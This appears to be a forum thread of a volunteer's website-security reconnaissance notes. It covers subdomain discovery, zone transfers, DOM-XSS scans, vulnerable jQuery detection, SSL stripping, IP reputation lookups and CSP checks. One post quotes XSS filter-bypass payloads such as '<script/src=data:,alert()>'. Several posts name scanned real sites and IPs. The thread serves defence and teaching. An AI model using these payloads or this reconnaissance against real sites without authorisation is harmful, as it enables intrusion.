But these are rate-limited against obvious abuse.

Google is your best friend: Google for site:example.com of delivers info on subsites op; just try for instance site:wordpress.com or site:moonfruit.com. The latter has many a phishing site (eg with site:moonfruit.com owa).
Such queries could be combined with Google dorks e.g. for specific Wordpress versions and/or used themes/ plugins.
Info credits go to: Erik van Straten.

Look at resources like: RobTex.com

https://pentest-tools.com/information-gathering/find-subdomains-of-domain#

Also try:  https://www.ultratools.com/

There are many (semi-)public DNS servers that gather data on DNS lookups.
Such data is being used to look up sub-domains and hostnames per IP.
Resources can be public or on demand.
Whenever you use a "secret"hostname one should check what DNS servers will get your requests.
Do not use public name servers and/or on clients.

Then we have AFXR unrestricted open to offenders, to get to all of the zone.
This should be limited to trusted name servers.
Check all name servers for a particular domain. open to offenders, all of the zone can be found.
This should be limited to trusted name servers. Check all name servers of that particular domain.
Has a zone file been entered online?

dig ANY. De DNS server for that domain has all known domains from cache.

An open root directory on a web server can also lead to disclosure.

Also a DNS server or interface of control panel (etc.) could be hacked.

Also look for test-servers. Often these are not being maintained.

The plugin update check for WordPress is spurious, it cannot be trusted fully.
Using back up plugins check plug-ins are not available online.
Remove disable plugins and all remaining files.. (info credits anonymous resources)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on July 24, 2020, 12:35:53 PM
What to do when we have a domain like: -http://ww12.d-analyse.com/  for instance?
This is a parking logic - parking crew monetizing website.

Hosted @, see:https://www.shodan.io/host/54.72.9.115
on -ec2-54-72-9-115.eu-west-1.compute.amazonaws.com

Is this website a legit website? This because the domain format is not a valid one, e.g. ww12.etc.
Can we say this a form of van cert. abuse?

Parking-monetizers (in the cloud) can so avoid detection.

Somewhat higher up in that hosting domain we find:
https://dnsspy.io/scan/eu-west-1.compute.amazonaws.com  (info credits go to: luntrus)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 07, 2020, 09:37:44 PM
XSS Filters a cure against DOM-XSS exploits.
Example code
Quote
*/
require ("mocha");
expect = require (/ expect.js');
xssFilters = require (''.../src/XSS-filters');
testutils = require ('./utils.js');
/require ('./unit/private-xss.filters.js');
require ('./unit/xss.filters.js');
source Yahoo Archives.
- See owasp.org XSS Filter Evasion Sheet.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2020, 09:20:17 PM
But nothing comes guaranteed in webcode development and with script security,
so one can even evade such XSS Filters:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Already convinced this will be an ongoing battle i.m.h.o.

For instance abuse scans worked with issues from a XSS Bypass Filter list,
for instance add: <script/src=data:,alert()> or e.g. %3Cscript/src=data:,alert(retire.js)%3E
(only for legit pentesters that were granted exclusive written permisson from the owner).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 09, 2020, 11:10:11 AM
L.S.

No more SQL injections with WASPlang?

* Sql injections are to be avoided using prepared statements with parameters
Sanitizing is felt to be for dummies.
However, considering the following  (for what it is worth ;)).

Little footprint, assembly line makes it harder for XSS attacks and SQL injection to succeed,
but only when code neatly sanitized *

Features

encourages immutability
immutable c-strings, memory manipulation, global variables, imported functions, 1st class functions
optional standard library runtime
functions with inline web assembly
test framework support
easy project dependency management
self hosting

Source: https://github.com/wasplang/wasp

Simplified parser code for configuring WSON (like JSON but then for WASPlang),
see: https://github.com/wasp-lang/wasp/issues/18

Also read: https://github.com/renjithgr/starred-repos & for sanitizing:
https://drupal.stackexchange.com/questions/1967/what-does-sanitized-mean-in-api-documentation

And to make this circle discussion go round again:
https://api.drupal.org/api/drupal/includes%21common.inc/function/filter_xss/7.x (see warnings there).

Info credits dehondgaatlatijddeaud & #sockpuppet & luntrus

polonus (volunteer 3rd party cold recon website securety analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2020, 10:28:15 AM
DOM-XSS exploits are just part of the story.
Pentesters and researchers work preferably from combined sec lists like:
https://github.com/danielmiessler/SecLists

So for instance analyse XSS-DOM sinks and sources -> https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html
with weaknesses (medium and low vulnerabilities) through retirable jQuery libraries:

Many developers use  Retire.JS (developed by Erlend Oftedal), also found online as:
https://retire.insecurity.today/  (Retire.JS can also be used as extension inside the browser).

Know that some libraries has reached EOL for quite some time, read:
https://github.com/jquery/jquery.com/issues/162#issuecomment-298656430

Only vulnerable in the case that certain functions are being called, so better to upgrade that particular library.

In that code there may be a weakness like s.iframe Src+,
but it could be src already before taht has been validated properly. 
(my info sources; luntrus & not me)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2020, 12:05:46 PM
Why the above information urges us to scan for such exploitable website code?

Let's go over vulnerable jQuery code from a site that is launching heodo malware and emotet malcode:
https://urlhaus.abuse.ch/url/428165/

Word Press scan shows 5 security issues in Word Press CMS.
Outdated plug-ins like header-footer-elementor 1.4.1 and elementor 2.9.7
User enumeration not set to disabled. Directory listing /wp-content/uploads/   is left as:  enabled

Detected as vulnerable jQuery library to be retired, see: https://retire.insecurity.today/#!/scan/ac83b63cdec87cf9d917d6cb12995a5df8c57a639e8063305f2e5f6f76c546f8

Results from scanning URL: -https://earnquick.co.uk/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Number of sources found: 41
Number of sinks found: 17

Sources: .top  .innerHTML  [name=  location.  .top,  .opener  .name=  .name&  .name,  .parent(  .open( 
Sinks: value=  href= data (g.data)  .data  data=  .write(  value  src= 

Site not flagged by DShield    CLEAN
AlienVault OTX      CLEAN
Cisco Talos    CLEAN
abuse.ch (Feodo)    CLEAN
URLhaus    CLEAN
Spamhaus (Drop / eDrop)    CLEAN

polonus (volunteer 3rd part cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2020, 07:23:29 PM
Check a website domain for hsts-preload inclusion: hstspreload.org

Site should be set to be in a certain ruleset. already available in the browser.
Re: https://trac.torproject.org/projects/tor/ticket/10424
Read -> http://www.thoughtcrime.org/software/sslstrip/

Why could this be important on tor to avoid certain recent MIM attacks?
Re: https://scotthelme.co.uk/hsts-preload-test/

Read: https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac

Tor will protect your identity not your data going over the exit node.

This hacker still seems to have owned 10% of existing exit nodes, hence mainly interested in bitcoin exit nodes.

We can assume his activities will not be taken lightly by fellow cybercrime colleages.  :D

See that https everywhere even as coming built-in with tor won't always protect the end-user against downgrading attacks.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2020, 10:17:41 PM
The first person that spoke about such SSL downgrading attack like SSL-stripping,
was a researcher by the name of Moxie Marlinspike.

There are three ways to perform such SSL stripping attack:
1. Using a Proxy Server;
2. Via ARP Spoofing;
3. Using  an insecure Hotspot

Also a 4th, I found up. Using a particular scan service (info credits: luntrus)
Example XSS-DOM scan: Results from scanning URL: -http://ad.nl
Number of sources found: 2
Number of sinks found: 421 (same results as with -https://ad.nl (random example)

Ways to protect against this is to enable HTTPS on pages of your website,
implement HSTS policy, as we discussed above, the browser won't open a site
unless the site uses HTTPS.  (info credits Comodo's SSL).

Mind that Mainland China now blocks https-traffic using TLS 1.3 & ESNI (known as encrypted server name indication),
read: https://geneva.cs.umd.edu/posts/china-censors-esni/esni/  &   https://gfw.report/blog/gfw_esni_blocking/en/

To test this - To perform this test, go and visit here: https://www.cloudflare.com/ssl/encrypted-sni/
and then click the orange button for “Check My Browser”. Just a moment later you  will see the results.

Chrome does not support ESNI yet at this moment. We can forsee it being rolled out like DoH.
As some schools would not like seeing their filtering software not functioning properly because of this.
So there are still some hooks, but different from interfering with Big Firewall surveillance measurements,
 as mentioned above.  ;)

Enjoy, my good friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 13, 2020, 10:07:22 PM
And again the community lost a fine website scan site.
This was hacked: -http://www.redleg-redleg.com/ 

The site at https://aw-snap.info/ is no longer available.
Also https://aw-snap.info/file-viewer/ gone.
Thank you redleg for all the scan results. We will miss you,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2020, 04:25:44 PM
How to block first party pixel tracking -> Privacy Badger is one of the many tools capable of doing this.
Read: https://www.eff.org/deeplinks/2019/07/sharpening-our-claws-teaching-privacy-badger-fight-more-third-party-trackers
Also https://ublockorigin.com/ is an adblocker capable of doing so.

Lets us see what Facebook does to circumvent this.
Whenever an end-user opens a Facebook ad a unique string becomes added to the landing page URL.
In there we will find hidden first party tracking pixels to circumvent third party tracking blocking.
This is downloaded like it would be a first party cookie, and can then still land at Facebook's desks.
This is now the only default Facebook will offer the user.

One now whould use rules to block, like
Code: [Select]
|| facebook.com*
and so on for all of Facebook domains and subdomains.

To block one could also use specific browser extensions like Neat URL and Facebook Container.
On Windows I use cookienator as a tool.

Also this Google and firefox extension -> https://github.com/jparise/chrome-utm-stripper
But a two-sided sword, when you like to unsuscribe for instance:
https://github.com/jparise/chrome-utm-stripper/pull/24


polonus

Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2020, 06:03:30 PM
Checked on cookies for a click-bait website a (conspiracy resource content website):
https://webcookies.org/cookies/niburu.co/347973

Compare with cookieserve scan results:
Cookie   Description   Duration   Type
__cfduid   The cookie is set by CloudFare. The cookie is used to identify individual clients behind a shared IP address and apply security settings on a per-client basis. It does not correspond to any user ID in the web application and does not store any personally identifiable information.   4 weeks   Necessary
60554656f3b887df8b325edf687fb71c      50 years ago   undefined

Also re: https://urlscan.io/result/fde1ce16-e8c0-4e60-8d61-14ee9919bac5/

DOM-XSS scan results -> Results from scanning URL: -https://niburu.co/
Number of sources found: 1
Number of sinks found: 221
&
Results from scanning URL: -https://niburu.co/modules/mod_sp_poll/assets/js/script.js
Number of sources found: 3
Number of sinks found: 4
&
Results from scanning URL: -https://niburu.co/media/jui/js/jquery-migrate.min.js?cf580d0734d987ba044c67a0cf573cc5
Number of sources found: 62
Number of sinks found: 31
&
Results from scanning URL: -https://niburu.co/modules/mod_gjc_slider/assets/js/jquery.gjc_slider-min.js
Number of sources found: 0
Number of sinks found: 0  no conflict..

2 vulnerable jQuerr libraries detected: https://retire.insecurity.today/#!/scan/d35a703f86d9f686d5118a1f878f9a74b322af98ad0abc763d56f661d48acee8

Improvement hints: https://webhint.io/scanner/13fda575-cb6d-42ab-a91c-3c0836e170d8

Outdated Joomla CMS: https://sitecheck.sucuri.net/results/niburu.co

Externally linked sites Google Safebrowsing approved.

For: -https/static.addtoany.com/menu/page.js
We have Hardening Improvements

Security Headers
Missing security header for ClickJacking Protection.
Alternatively, you can use Content-Security-Policy: frame-ancestors 'none'.
Affected pages:
-https://static.addtoany.com/404javascript.js
-https://static.addtoany.com/404testpage4525d2fdc

Missing Content-Security-Policy directive.
 We recommend to add the following CSP directives
(you can use default-src if all values are the same): script-src, object-src, base-uri, frame-src.
Affected pages:
-https://static.addtoany.com/404javascript.js
-https://static.addtoany.com/404testpage4525d2fdc

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2020, 05:15:09 PM
To avoid JavaScript hick-ups and weaknesses:
https://htmlcheatsheet.com/js/  (online interactive cheatsheet)

Next to url-stripper use https://www.convertcsv.com/url-extractor.htm
and Trace extension for Google Chrome & firefox.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2020, 05:33:12 PM
Millions and millions of vulnerable SSH servers: https://blog.rapid7.com/2020/08/28/nicer-protocol-deep-dive-secure-shell-ssh/

check with Rebex SSH Check: https://sshcheck.com

Random example: https://sshcheck.com/server/87.98.242.21/

And in another case we could stumble on e.g. -https://assets.plesk.com/static/default-website-content/public/default-server-index.js
via -http://178.33.71.11   all out there on the cold & insecure Interwebz. We should all care for better security. shouldn't we really?

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2020, 11:06:08 PM
Test also in case of cert issues: https://www.webpagetest.org/result/200901_52_c2a7f61a65a9e66a520524946e966718/
Random example. Retested here: https://www.webpagetest.org/result/200904_8D_1f85ed1eef2081770e447b04e48a3dd3/
json results: https://www.webpagetest.org/jsonResult.php?test=200904_8D_1f85ed1eef2081770e447b04e48a3dd3&pretty=1
HAR file blocked by MBAM extension as File blocked: blob:https://obfuscator.io/9d519935-84da-4447-87f7-67a5613d4525
not being downloaded...File blocked: -http://www.netresec.com/?page=PacketCache -> https://www.virustotal.com/gui/url/93300d5ad0804e4cd092be2962477da6138963d8c2bf3759daa918f941eaf29a/details
10 embedded IP detections: https://www.virustotal.com/gui/ip-address/81.95.105.80/detection

Can be combined with other scans and tests.

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2020, 02:55:49 PM
Abuse from IP, where to check: https://apility.io/search/52.217.81.116  (no abuse - random example)

Other resources:  https://ipremoval.sms.symantec.com/  and  https://www.cyren.com/security-center/cyren-ip-reputation-check
Re: https://ipinfo.io/AS42772  (random example) because of a check-up in https://www.stopforumspam.com/
Re: https://www.researchgate.net/publication/224240107_Abnormally_Malicious_Autonomous_Systems_and_Their_Internet_Connectivity
Re: https://www.statista.com/statistics/1028845/poland-autonomous-systems-where-candc-servers-were-hosted/
leading to publications like: https://www.cyber-threat-intelligence.com/publications/CNS2018-Cerber.pdf

Also: -https://www.threatstop.com/checkip but this website is being blocked due to possible suspicious activity by MBAM extension.

polonus (volonteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2020, 07:13:02 PM
Let us check a particular abuse IP = 185.132.53.11
See -1 red score here: https://apility.io/search/185.132.53.11
All the vulnerabilities on the server for that IP: https://www.shodan.io/host/185.132.53.11
Various reports on that IP here: https://urlhaus.abuse.ch/url/454419/
See: https://en.asytech.cn/check-ip/185.132.53.13  and  https://ipinfo.io/AS24961/185.132.53.0/24
and https://otx.alienvault.com/indicator/ip/185.132.53.11
and https://www.abuseipdb.com/check/185.132.53.11  &   https://cleantalk.org/blacklists/as24961/185.132.53.0/24
and https://www.anti-attacks.com/daten-abfrage/rir-abfrage/abfrage_rir_185.132.53.0-24
and https://www.threatsourcing.com/dnall-free.txt  &  listed here: https://m4lwhere.org/feeds/last_30d.txt

Tools and much more here: https://www.fortypoundhead.com/default.asp
as for instance this one: https://www.fortypoundhead.com/tools_ipcheck.asp

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 10, 2020, 10:15:19 PM
Additional deny list: https://rkn.darkbyte.ru/logs/19102018_1330.htm

Check IPs listed there against other resources, like: http://www.crimeflare.org:82/cgi-bin/cfdom2.cgi/nl37.1.201

Check against http://ipinfolookup.com/   &   https://db-ip.com/  &    https://www.virustotal.com/gui/ip-address/

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 13, 2020, 01:23:08 PM
Interesting resources also for backlinks and what is on a host:
Random example: https://host.io/chevallier.biz

Compare and check results against https://www.virustotal.com/gui/ip-address/  see under: relations there.

And also here: https://www.shodan.io/host/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 14, 2020, 06:30:53 PM
Scan your Magento CMS (webshop content management software) against vulnerabilities etc.:
https://www.magereport.com/

Mind that Magento version 1 has reached end of life now, and 2000 websites have been compromised with malware lately.
Read: https://sansec.io/research/largest-magento-hack-to-date   (info source = Sansec's  Willem de Groot).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 15, 2020, 02:08:38 PM
Collection of IP tools: http://afspraakloket.nl/
And http://ipindetail.com/ip-blacklist-checker/  But HTTPS Everywhere warns here for downgrading!
Also: https://www.brightcloud.com/tools/url-ip-lookup.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 15, 2020, 11:10:20 PM
The use of the shodan searchengine
It can be used for protection as you will read below, but also abused by stately actors in order to compromise.

We may read: https://us-cert.cisa.gov/ncas/alerts/aa20-258a (report of the 14th of September 2020 late)

From that CISA report I quote:

Pre-attack analysis:
Quote
Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.
The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.

 

Random example: https://www.shodan.io/host/173.249.31.85  - We will be able to get a server nginx https page: via -http://173.249.31.85/ that means via an unencrypted connection - nginx version = 1.10.3 -  (attackers have other ways of establishing that this is indeed the version number in use there).

NGINX has a weird versioning system where even numbered releases (.i.e. 1.10, 1.8, 1.6) are stable, and odd numbered releases (i.e. 1.11, 1.9, 1.7) are the mainline. Security fixes normally get patched into the stable branches pretty quickly.

We will not go into all such particulars as this is not the scope of this thread.

The security researcher is known to work in a reversed way as how the attacker and stately actor use to operate.

Same non-configured server page results are received from -http%3A%2F%2Fvmi213334.contaboserver.net

All we will get here is a status alert (as the site is non-configured):
Quote
Success. Failed to load resource: the server responded with a status of 404 (Not Found)
From the https page we will get
Quote
Script
isChrome: true
throttled: (fn, timeout) => {…}
v_browser: {loadTimes: ƒ, csi: ƒ, …}
Window
Global
and
Quote

console.log('[VULNERS] Init');

v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {
    console.log('[VULNERS] Rules', rules);

    let html = document.documentElement.innerHTML;
    let matches = [];

    for (let rule of rules) {
        try {
            let match = html.match(new RegExp(rule.regex));

            if (match) {
                console.warn('[VULNERS] Match', rule.alias, match[0], match[1]);
                matches.push({url: document.location.host, rule, version: match[1]});
            }
        } catch(e) {
            console.warn('[VULNERS]', e)
        }
    }

    matches.length && v_browser.runtime.sendMessage({ action: 'match', matches: matches});
});

var origOpen = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function() {
    console.log('request started!');
    this.addEventListener('load', function() {
        console.log('request completed!');
        console.log(this.readyState); //will always be 4 (ajax is completed successfully)
        console.log(this.responseText); //whatever the response was
    });
    origOpen.apply(this, arguments);
};
 

And then we stumble upon the fact that nginx.org but also that nginx dot com is available as a link on that page ->
A DOM-XSS downgraded http scan, results in one http result and several wp-include https files...

Results from scanning URL: -http://nginx.com
Number of sources found: 10
Number of sinks found: 236

Results from scanning URL: -https://www.nginx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 0
Number of sinks found: 3

Results from scanning URL: -https://www.nginx.com/wp-includes/js/underscore.min.js?ver=1.8.3
Number of sources found: 3
Number of sinks found: 1

Results from scanning URL: -https://www.nginx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 35
Number of sinks found: 29

Results from scanning URL: -https://www.nginx.com/wp-content/themes/nginx-new/js/popper.min.js?ver=1.0
Number of sources found: 41
Number of sinks found: 17

Results from scanning URL: -https://www.nginx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 162
Number of sinks found: 34   (with all sort of mail domains)

Retirable and vulnerable code: https://retire.insecurity.today/#!/scan/fb3f45383d54a145eb02ed341cb0cf282502c84c6679c277c4c7a372181e180b

Going round the full circle, as we started with a shodan IP scan, we now perform a Rebex SSH scan for that same Ip,
delivering also interesting information about the host: https://sshcheck.com/server/173.249.31.85  together with some weak algorithms.

One should give security intelligence attention to keep the website and (web)server-infrastructure (behind it) as secure as possible. Let us all live up to what the avast mission is all about: keeping us all as secure as can be.

polonus (volunteer 3rd party cold reconnaissance website security analyst & website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2020, 10:49:23 AM
L.S.

DuckDuckGo removed from choice menu on Android.
Google get's rid of a privacy friendly competitor by complying to EU rules in a sneaky way outbidding it.

This is how "your fact-checking search engine monopolist" did this as predicted:

https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/

There is a way around this by installing Tor Browser on android, that has DuckDuckGo by default.

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on September 29, 2020, 10:58:33 AM
DuckDuckGo removed from choice menu on Android.
Google get's rid of a privacy friendly competitor by complying to EU rules in a sneaky way outbidding it.

This is how "your fact-checking search engine monopolist" did this as predicted:

https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/
:o >:(
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2020, 02:06:41 PM
Of course you can make your own choice not a pre-menu one of these twenty two alternative search engines:
https://kinsta.com/blog/alternative-search-engines/

Some are very specific like  Wolfram Alpha -> https://kinsta.com/blog/alternative-search-engines/#6-wolframalpha

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 29, 2020, 02:08:07 PM
L.S.

DuckDuckGo removed from choice menu on Android.
Google get's rid of a privacy friendly competitor by complying to EU rules in a sneaky way outbidding it.

This is how "your fact-checking search engine monopolist" did this as predicted:

https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/ (https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/)

There is a way around this by installing Tor Browser on android, that has DuckDuckGo by default.

polonus
I think it's a bit unfair to blame the giant Google for following the regulations.
The blame should be put squarely on the ones that made the regulations.
If a tax break is unfair, does that mean I shouldn't take it? Wrong. Change the law don't blame someone when they
take advantage of the law.
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2020, 06:15:07 PM
Hi bob3160,

You may be right there, authorities nowadays also have a commercial incline
and wanna earn some cents on the dollar from the market.

They also make use of Google's dominant position, they also do so playing out providers against each other.

One should normally have a choice from the top ten search-engines down.
Privacy friendly searching apparently has no priority for a lot of folks (end-users).

They don't feel the need, but if the service is free you'd always will pay with your data.

Or you could use Ecosia and the green Ecosia search engine alternative will plant trees from the extra ad-fees you generate.

Best privacy-friendly search-engines: https://restoreprivacy.com/private-search-engine/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2020, 06:47:57 PM
Check on IP for abuse...

Check IP for being a scam, random example: https://scamalytics.com/ip/194.33.61.33
while not having a bad rep here: https://ipremoval.sms.symantec.com/ipr/lookup

Blocklists: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/policy/use-an-external-dynamic-list-in-policy/palo-alto-networks-malicious-ip-address-feeds
Deny-kist look-up: https://apility.io/search/194.33.61.33

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 04, 2020, 04:17:23 PM
L.S.

In this way we can also establish the % of found abuse on Tor-exit-nodes:
Check scamalytics.com/ip & apility.io/search/  & https://www.cyren.com/security-center/cyren-ip-reputation-check
& https://cleantalk.org/blacklists/78.46.73.176 (random example - blacklisted there)
against https://www.dan.me.uk/tornodes  &  https://www.bigdatacloud.com/insights/tor-exit-nodes
hourly updates: https://github.com/SecOps-Institute/Tor-IP-Addresses

% vary from 1 % (Hong-Kong, Singapore) to medium risk of under 45% of existing abuse.
also the web reputation of hosters/AS of such IPs should be taken into account here.



polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2020, 06:54:28 PM
Blocked by Trace - tracking blocking extension = -https://static.addtoany.com/*
blocked url-path = -*hxtps://static.addtoany.com/menu/page.js*
blocked host URL = -*static.addtoany dot com*
blocked root domain = *addtoany dot com*

-> https://cookiepedia.co.uk/host/.addtoany.com

Another resource has server problems at the moment and kicks up an 500 application error: https://webcookies.org/cookies/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 09, 2020, 02:32:48 PM
Exploring info on a particular abuse IP: https://vulners.com/rst/RST:7CCC9BB6-0041-3A45-A211-8EBD315AF89F

This because of abuse mentioned here, a malware download reported:
https://urlhaus.abuse.ch/url/660405/ 

After 5 days re-analyzed and now 35 engines will detect this Mirai/elf/Mozi malcode: https://www.virustotal.com/gui/file/12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef/detection
Also see: https://www.virustotal.com/gui/file/12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef/relations

See new reports: https://www.virustotal.com/gui/file/12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef/community

Also consider: https://scamalytics.com/ip/118.172.176.41 - on host: https://urlhaus.abuse.ch/host/118.172.176.41/
Re: https://www.shodan.io/host/118.172.176.41 - no third party dependencies preventing

More particulars: https://cdn.statically.io/gl/curben/urlhaus-filter/master/urlhaus-filter-online.txt

Re: https://osint.digitalside.it/Threat-Intel/lists/latesturls.txt 

polonus

Title: Re: Tests and other Media topics
Post by: polonus on October 16, 2020, 02:00:24 PM
More threat IP info resources:

Starting here: https://blackip.ustc.edu.cn/sshrawlist.php?ip=37.49.226.220
Also: https://www.abuseipdb.com/check/37.49.226.220
and further historical records for that specific IP:
-> https://urlhaus.abuse.ch/url/372420/
-> https://badpackets.net/botnet-c2-detections/
listed also here: https://www.abuseat.org/iotcc.txt
medium fraud score of 11 given here: https://scamalytics.com/ip/37.49.226.220

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2020, 01:55:48 PM
We should scan for retirable (vulnerable or left) jQuery libraries using the Retire.JS extension or online here:
https://retire.insecurity.today/#  (both from Erlend Oftedal)

A similar procedure should now also be undertaken for node.js also by Retire.JS because of malicious npm-packages that could open up a reverse shell like: plutov-slack-client, nodetest1010 en nodetest199 &  npmpubman.

See: https://www.npmjs.com/snyk & http://snyk.github.io/docs/nodejs/
and https://developers.redhat.com/blog/2017/04/12/using-snyk-nsp-and-retire-js-to-identify-and-fix-vulnerable-dependencies-in-your-node-js-applications/

Gain insight into your website code with: Web Insight here: -> webint.io
Not suspicious this example, but given just to show how it functions:
https://webint.io/result/73907b10-113b-11eb-9432-8f38c91f3c54
But it could also be used to scan suspicious websites.  ;)

polonus


Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2020, 06:07:56 PM
Compare a number of different scan results:

1. https://urlscan.io/result/8958dea1-7023-4e0d-8420-373a46498113/

2. One could also scan through on the various code scan with this scan:
https://webint.io/result/4f38f860-1156-11eb-a034-11f74c826a95

3. Results of a DOM-XSS scan, just results: URL: -https://quiz.edusantosoficial.com.br/
Number of sources found: 133
Number of sinks found: 33

Results from scanning URL: -https://office.builderall.com/scripts/pixel/pixel-bundle.js
Number of sources found: 1
Number of sinks found: 1

Results from scanning URL: -https://office.builderall.com/scripts/pixel/pixel-bundle.js
Number of sources found: 8
Number of sinks found: 2

4. Vulnerable JQuery libraries scanned: https://retire.insecurity.today/#!/scan/1dea67faabb7371d011f80e7f204bfd692e686194ddc6a2fbdc5bc3de142bddc

Vulners does not detect here. Host details: https://www.shodan.io/host/45.162.228.138
Quote
Tracker SSL - Website is insecure by default
100% of the trackers on this site could be protecting you from NSA snooping. Tell -edusantosoficial.com.br to fix it.

Identifiers | All Trackers
 Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.

-skhXXXXXXXXXXXqjfuors7ai8tf -quiz.edusantosoficial.com.brphpsessid
 Tracking IDs could be sent safely if this site was secure.
 Tracking IDs do not support secure transmission.  Three Content Tracking Requests from facebook

5. Second op check at: https://webcookies.org/url/omni - this for privacy and tracking implications.

Quote
Domain Control Validation: Issuer:
Let's Encrypt
Let's Encrypt Authority X3

6. Compare with F-grade results here: https://observatory.mozilla.org/analyze/quiz.edusantosoficial.com.br

7. See 251 improvement hints given here: https://webhint.io/scanner/496ed38c-3df4-4792-921b-0564d55746fe

8. Given clear at this scan: http://isithacked.com/check/https%3A%2F%2Fquiz.edusantosoficial.com.br%2F

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2020, 11:05:47 PM
L.S.

See erlend oftedal's resources: https://github.com/RetireJS/retire.js

What can the above information deliver? Well insight in potentially vulnerable and sometimes exploitable code.
All depends of what security layers are available there on client and server (best policies applied)

A short partial example:

So we can scan for a vulnerability in retirable script like:
Quote
{Object.defineProperty(w.Event.prototype,e,{enumerable:!0,configurable:!0,get:g(t)?function(){if(this.originalEvent)return t(this.originalEvent)}:function(){if(this.originalEvent)return
like mentioned in https://nvd.nist.gov/vuln/detail/CVE-2019-11358
for hxtps://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.slim.min.js
Re: https://retire.insecurity.today/#!/scan/a9194e28e3a8b9a10562a80c8c47ea88967f4a09c469e3bb769cfdad7ead9c68
Considering: Results from scanning URL: -https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.slim.min.js
Number of sources found: 33
Number of sinks found: 10

But skimming code for this manually is a difficult task, that is why we have our DOM XSS scanners, error scanners, our sources and sinks.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 19, 2020, 03:16:05 PM
For websites that have a Content Security Policy, this is often not been configured to follow so-called best policies.

There is an extension for the browser, CSP Evaluator to check on this.
One could also do this online.

Example:  https://cspvalidator.org/#url=https://www.ad.nl/
CSP Evaluator gives:
Quote
Evaluated CSP as seen by a browser supporting CSP Version 3
expand/collapse all
error default-src

error https:
https: URI in default-src allows the execution of unsafe scripts.
checkblob:

errorscript-src

error'unsafe-inline'
'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
help_outline'unsafe-eval'
'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
error https:
https: URI in script-src allows the execution of unsafe scripts.

Error on opening screen where there is no CSP installed for
-Error fetching CSP policies from https://myprivacy.dpgmedia.nl/consent/?siteKey=V9f6VUvlHxq9wKIN&callbackUrl=https%3a%2f%2fwww.ad.nl%2fprivacy-gate%2faccept-tcf2%3fredirectUri%3d%252f   received from https://myprivacy.dpgmedia.nl/: 400 Bad Request

And also check online here: https://csp-evaluator.withgoogle.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 19, 2020, 05:23:08 PM
On the look-out for DNS sub-domains for a known malware domain?

